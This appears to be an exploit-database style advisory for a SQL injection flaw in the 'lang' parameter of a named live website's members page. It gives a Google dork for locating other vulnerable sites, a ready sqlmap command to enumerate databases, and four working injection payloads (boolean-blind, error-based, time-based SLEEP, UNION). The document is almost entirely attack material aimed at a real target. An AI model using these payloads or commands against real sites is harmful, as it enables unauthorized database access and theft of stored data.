|=========================================================================== | # Exploit Title : mmcct | SQL injection Vulnerability | | # Author : Ali Seddigh | | # Category : Web Application | | # Google Dork : inurl:members.php?lang=en | | # Software Link : www.mmcct.mu | | # Tested on : [ Windows ~> 10 ] | | # Vulnerable Path : https://www.mmcct.mu/pages/board_of_members.php?lang=en | | # Date : 2021-04-10 |=========================================================================== | << Demo on sqlmap >> | | # Vulnerability Parameter [lang] | # sqlmap Query : python sqlmap.py -u "https://www.mmcct.mu/pages/board_of_members.php?lang=en" --dbs | |=========================================================================== # POC : Parameter: lang (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: lang=en' AND 7723=7723 AND 'LkKJ'='LkKJ Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: lang=en' AND (SELECT 9975 FROM(SELECT COUNT(*),CONCAT(0x716a716271,(SELECT (ELT(9975=9975,1))),0x716b786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FthE'='FthE Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: lang=en' AND (SELECT 3032 FROM (SELECT(SLEEP(5)))bdHq) AND 'Xbrs'='Xbrs Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: lang=-5281' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a716271,0x7359437a426369794d525a5a7a46666557477368564172425a434b62755877416d527a5850704a64,0x716b786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - |=========================================================================== | # Discovered By : Ali Triplex |===========================================================================